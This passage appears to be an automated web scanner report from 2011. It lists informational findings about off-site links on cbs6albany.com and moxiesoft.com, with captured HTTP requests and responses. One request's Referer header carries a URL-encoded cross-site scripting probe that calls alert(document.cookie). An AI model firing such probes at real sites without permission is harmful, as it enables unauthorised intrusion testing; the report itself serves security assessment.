http://www.lively-nation.com/healthy/wrgb/
http://www.twitter.com/cbs6_teresa

Request

GET /common/archives/?cat=Movie+Reviews&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Education+Promo&ghier=news%7Carchive&us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
<a href="http://albany.profootball.upickem.net/"><img src="/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a href="http://weathernet6.wrgb.com/">Weathernet6</a>
...[SNIP]...
<li><a href="http://mmod.ncaa.com/" target="_blank">NCAA March Madness on Demand</a>
...[SNIP]...
<li><a href="http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&SECTION=SPORTS">National</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6albany" target="_blank">CBS 6 News Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/cbs6_lizb" target="_blank">Liz's Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6_JerryG" target="_blank">Jerry's Feed</a>
...[SNIP]...
<li><a href="http://www.twitter.com/cbs6_teresa" target="_blank">Teresa's Feed</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476" target="_blank">CBS 6 Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=855419171">Liz...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1" target="_blank">Jerry...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/Steve.LaPointe.CBS6?ref=name" target="_blank">Steve LaPointe...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/CBS6Greg">Greg's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100000446238259">Teresa's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=1428716895&ref=profile" target="_blank">Marci's Facebook</a>
...[SNIP]...
<li><a href="http://www.cwalbany.com" target="_blank">Capital Region's CW</a>
...[SNIP]...
<li><a href="http://www.lively-nation.com/healthy/wrgb/">Healthy Living</a>
...[SNIP]...
<li><a href="http://sixonseniors.freedomblogging.com/">Six on Seniors Blog</a>
...[SNIP]...
<li><a href="http://www.bryantstratton.edu/Locations/New-York/Albany.aspx">Dream Career</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394">Baptist Health on Facebook</a>
...[SNIP]...
<li>
<a class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/vehicle/">Cars</a></li>
<li><a href="http://cbs6albany.oodle.com/housing/sale/">Real Estate</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/service/">Services</a>
...[SNIP]...
<a href="http://www.cbs6albany.com/entertainment/simpsons-1370679-fbi-movie-springfield.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
<br /><img src="http://common.onset.freedom.com/images/searchBox_google_small.gif" width="47" height="14" alt="google" /></div>
...[SNIP]...
<a href="javascript:;" onclick="javascript:document.fisearch2.submit()"><img src="http://common.onset.freedom.com/images/btn_search.gif" border="0" alt="Search"></a>
...[SNIP]...
<li><a href="http://www.cbs.com/info/hdtv/index.php" onclick="window.open('http://www.cbs.com/info/hdtv/index.php');return false">CBS HDTV</a>
...[SNIP]...
<li><a href="http://www.cbs.com" onclick="window.open('http://www.cbs.com');return false">CBS.com</a>
...[SNIP]...
<li><a href="http://www.dailygazette.com" onclick="window.open('http://www.dailygazette.com');return false">Daily Gazette</a>
...[SNIP]...
<li><a href="http://www.berkshireeagle.com/" onclick="window.open('http://www.berkshireeagle.com');return false">Berkshire Eagle</a>
...[SNIP]...
<li><a href="http://spotlightnews.com/" target="_blank">Spotlight Newspapers</a>
...[SNIP]...
<p><a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false">Privacy Policy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false">User Agreement</a>
...[SNIP]...
<p><a href="http://www.freedom.com" target="_blank">Freedom Communications, Inc.</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

17.312. http://www.cbs6albany.com/common/tools/load.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page

The response contains the following link to another domain:

http://common.onset.freedom.com/images/loading.gif

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:27 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 15:39:18 GMT
ETag: "a2c7ae864c4a3cf6c62f0e6ccfec4c7e-26414"
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 17:37:27 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 26414

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page */
   function loadPoll(pollid,sitecode)
   {
           var
...[SNIP]...
Only display nav if slideCount (alldivs) > 1

////Ajax related settings
var csbustcachevar=0 //bust potential caching of external pages after initial Ajax request? (1=yes, 0=no)
var csloadstatustext="<img src='http://common.onset.freedom.com/images/loading.gif' /> Requesting content..." //HTML to indicate Ajax page is being fetched
var csexternalfiles=[] //External .css or .js files to load to style the external content(s), if any. Separate multiple files with
...[SNIP]...

17.313. http://www.cbs6albany.com/sections/thirdParty/iframe_header/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/thirdParty/iframe_header/

Issue detail

The page was loaded from a URL containing a query string:

http://www.cbs6albany.com/sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com

The response contains the following links to other domains:

http://albany.profootball.upickem.net/
http://cbs6albany.oodle.com/
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=cbs6albany.oodle.com&ctype=&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&us=anonymous

Request

GET /sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1298828234584%26vn%3D1; __qca=P0-387650238-1296236241942; s_nr=1296236252424; ebPanelFrequency_.www.cbs6albany.com=4189023%3A2%3A1%3A1296322656115; ebNewBandWidth_.www.cbs6albany.com=2030%3A1296236256165; s_cc=true; s_lastvisit=1296308278321; fi_dslv=Less%20than%201%20day; s_vnum_w=1296367200803%26vn%3D2; s_vnum_m=1296540000804%26vn%3D2; s_sq=%5B%5BB%5D%5D; Zvents=jblyxxj3qv; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:27:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 14:37:32 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 5940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=cbs6albany.oodle.com&ctype=&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
<a target='_top' href="http://albany.profootball.upickem.net/"><img src="http://www.cbs6albany.com/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a target='_top' class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...

17.314. http://www.moxiesoft.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/search.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/search.aspx?searchtext=

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /search.aspx?searchtext= HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.315. http://www.moxiesoft.com/tal_lp/campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_lp/campaign.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_lp/campaign.aspx?id=3576

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /tal_lp/campaign.aspx?id=3576 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.316. http://www.moxiesoft.com/tal_lp/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_lp/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_lp/default.aspx?id=2736

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /tal_lp/default.aspx?id=2736 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 80054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.317. http://www.moxiesoft.com/tal_news/press_release.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/press_release.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_news/press_release.aspx?id=3530

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://static.addtoany.com/buttons/share_save_120_16.gif
http://static.addtoany.com/menu/page.js
http://twitter.com/moxiesoft
http://www.dld-conference.com/
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.moxiesoftware.com/
http://www.weforum.org/
http://www.youtube.com/moxiesoft

Request

GET /tal_news/press_release.aspx?id=3530 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />


...[SNIP]...
<h1>World-Renowned Author and <a href="http://www.moxieinsight.com/" target="_blank">Moxie Insight</a>
...[SNIP]...
<p>He is the Chairman of <a title="moxie insight" href="http://www.moxieinsight.com/" target="_blank">Moxie Insight</a>, the thought leadership arm of <a href="http://www.moxiesoftware.com/">Moxie Software</a>
...[SNIP]...
<br /><a href="http://www.dld-conference.com/" target="_blank">DLD11...s</a>
...[SNIP]...
<br /><a href="http://www.weforum.org/" target="_blank"><br />
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.318. http://www.moxiesoft.com/tal_news/webinars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/webinars/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_news/webinars/default.aspx?id=3436

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /tal_news/webinars/default.aspx?id=3436 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82954

